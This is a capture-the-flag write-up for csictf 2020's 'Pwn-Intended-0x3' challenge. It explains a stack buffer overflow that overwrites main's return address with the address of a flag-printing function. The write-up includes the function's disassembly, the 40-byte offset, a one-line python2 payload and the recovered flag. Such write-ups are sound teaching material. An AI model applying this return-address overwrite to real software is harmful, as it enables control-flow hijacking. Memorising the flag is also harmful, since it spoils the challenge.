csictf 2020

CTF Writeup - https://ctftime.org/event/1081

Home csictf 2020 Writeups Home
22 July 2020

Pwn-Intended-0x3

by AnandSaminathan

Files

Solution

This is exactly same as coffer-overflow-2 from redpwn-2020. In this case the return address of main has to be replaced with the address of a function called flag (which prints the flag).

Disassembly of flag with the starting address:

   0x00000000004011ce: push   rbp
   	                   mov    rbp,rsp
   	                   lea    rdi,[rip+0xe5f]        
                       call   0x401030 <puts@plt>
   	                   lea    rdi,[rip+0xe7b]        
   	                   call   0x401050 <system@plt> # system("cat flag.txt")
   	                   mov    edi,0x0
   	                   call   0x401070 <exit@plt>

Using gdb, the distance between the starting address of the buffer and the return address of main in the stack was found to be 40 bytes (rbp + 8 bytes), so we can have some padding of 40 bytes and then have the address of flag function in little endian. This worked:

python2 -c "print 'A'*40 + '\xce\x11\x40\x00\x00\x00\x00\x00'" | ./pwn-intended-0x3

Flag

csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}
tags: Pwn